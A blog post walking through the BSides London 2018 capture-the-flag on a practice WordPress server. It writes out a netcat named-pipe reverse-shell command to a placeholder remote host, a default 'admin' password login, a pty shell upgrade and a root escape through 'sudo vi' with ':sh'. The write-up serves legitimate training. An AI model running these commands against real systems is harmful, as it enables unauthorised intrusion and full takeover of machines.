BSides LDN 2018 CTF by Immersive Labs

Greg
3 min readApr 7, 2018

--

Fortunately I have a ticket for BSidesLDN already, but wanted to have a play with the CTF. I haven’t used the immersive labs platform before and thought it a good opportunity to try it out too.

https://www.immersivelabs.com is designed to be a cyber range to learn and practice skills in a controlled environment. The challenge for BSides was based around a wordpress installation on a Ubuntu LTS machine. A fairly typical configuration.

The immersive labs platform is intuitive to use, however I found that the labs wouldn’t launch if viewing from Kali, this is my only minor gripe. The goal of the CTF was to get the root flag.

Spoiler alert, the solution I used follows…

After an initial NMap of the public IP SSH and HTTP are the only two services exposed, this confirmed the lab instructions.

Next up was firing up Burp to start enumerating the site and exploring. Since the site is a fairly default wordpress site I did an inital check with WP-Scan to check for anything obvious. This confirmed the user ‘admin’ had been making posts. I checked for the default wp-admin URL, BINGO.

With a default URL I tried the obvious password of admin and I was surprised to get straight into the admin site.

With the goal in mind of obtaining the root flag, we obviously need root privileges. I had a number of options to get an initial shell on the system including:

  • Uploading a PHP webshell
  • Using a WP plugin
  • Looking for a known exploit

I opted for a simple WP Plugin and used WPTerm to get a PHP shell. This isn’t a full shell and limits some of the commands that you can run. To make life easier I setup a reverse shell with trusty netcat using a named pipe to redirect input and output

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEIP REMOTE PORT >/tmp/f

With a local shell it is time to upgrade to a tty, python3 was installed on the machine so I used the pty module to launch a shell.

python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

Next up was to enumerate the environment and users that exist, I won’t repeat them all here as there are lots of resources and guides, one of my favourites. But to suffice to say I checked out for known exploits, users with elevated permissions, suid/guid binaries, sudoers etc.

After a bit of enumeration the sudoers file was the key to solving the challenge

sudo -l
Matching Defaults entries for www-data on
ip-172–31–47–65.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
ip-172–31–47–65.eu-west-1.compute.internal:
(ALL) NOPASSWD: /usr/bin/vi /var/www/html/*

Thats helpful, we can run vi with sudoers permission in the html directory. vi and vim both allow you to run system commands from within their programs, lets launch vi and get the flag.

sudo vi /var/www/html/c

:sh

:sh
root@ip-172–31–47–65:/var/www/html# ls /root
ls /root
flag.txt
root@ip-172–31–47–65:/var/www/html# cat /root/flag.txt
cat /root/flag.txt
Congradulations on finding the flag email the code below to info@immersivelabs.co.uk!

The first person to complete this challenge gets themselves a ticket to Bsides!

code: <THE CODE IS HERE….>

--

--

Greg

Security addict, 17+ years in industry making systems more secure and finding those that aren’t